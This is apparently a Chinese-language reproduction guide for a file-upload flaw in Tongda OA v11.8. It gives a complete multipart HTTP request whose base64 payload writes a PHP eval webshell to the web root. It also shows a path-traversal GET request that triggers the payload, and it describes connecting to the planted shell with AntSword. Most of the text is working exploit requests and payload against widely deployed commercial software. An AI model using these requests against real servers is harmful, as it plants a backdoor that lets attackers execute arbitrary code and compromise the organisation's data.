通达OA-V11.8-api-ali.php文件上传漏洞复现

1、环境准备

　　下载通达OA-v11.8版本（未打补丁版本）

　　地址：https://cdndown.tongda2000.com/oa/2019/TDOA11.8.exe

　　VMvare_Win7环境

　　安装通达OA11.8(D:/myoa)

　　设置地址：localhost  端口：8081

　　安装完毕，即可访问。

　　

 

 

 

2、复现步骤

　　2.1、向mobile/api/api.ali.phpf发送请求包

ZmlsZV9wdXRfY29udGVudHMoJy4uLy4uL2ZiNjc5MGY0LnBocCcsJzw/cGhwIEBldmFsKCRfUE9TVFsnc2hlbGwnXSk7IGVjaG8ibHVjayI7ID8+Jyk7"
进过base64解密，对应出：
file_put_contents('../../fb6790f4.php','<?php @eval($_POST['shell']); echo"luck"; ?>');

　　上传进入一个php文件，也就是一个“一句话木马”

　　完整的请求包如下所示：

POST /mobile/api/api.ali.php HTTP/1.1
Host: 192.168.1.33:8081  #自己如上设置的ip与端口
User-Agent: Go-http-client/1.1
Content-Length: 435
Content-Type: multipart/form-data; boundary=502f67681799b07e4de6b503655f5cae
Accept-Encoding: gzip

--502f67681799b07e4de6b503655f5cae
Content-Disposition: form-data; name="file"; filename="fb6790f4.json"
Content-Type: application/octet-stream

{"modular":"AllVariable","a":"ZmlsZV9wdXRfY29udGVudHMoJy4uLy4uL2ZiNjc5MGY0LnBocCcsJzw/cGhwIEBldmFsKCRfUE9TVFsnc2hlbGwnXSk7IGVjaG8ibHVjayI7ID8+Jyk7","dataAnalysis":"{\"a\":\"錦',$BackData[dataAnalysis] => eval(base64_decode($BackData[a])));/*\"}"}
--502f67681799b07e4de6b503655f5cae--

　请求响应结果如下所示。　

 

 

 2.2、第二步，请求一个url,以Get请求方式，如下

http://192.168.1.33/inc/package/work.php?id=../../../../../myoa/attach/approve_center/2109/%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E.fb6790f4

　　其中，myoa/attach/approve_center为其路径地址   (也有可能默认路径为MYOA/attach/approve_center,版本不通，创建的默认路径也不同)

　　2204：代表着其创建日期，22年4月

上传文件路径访问成功后，即可出现"+ok"提示。如图：

 

 

 

用蚁键连接，获取上传的shell文件===>http://192.168.1.23:8081/fb6790f4.php,已经被上传到webroot文件下，也就是根路径/

 

 至此成功！。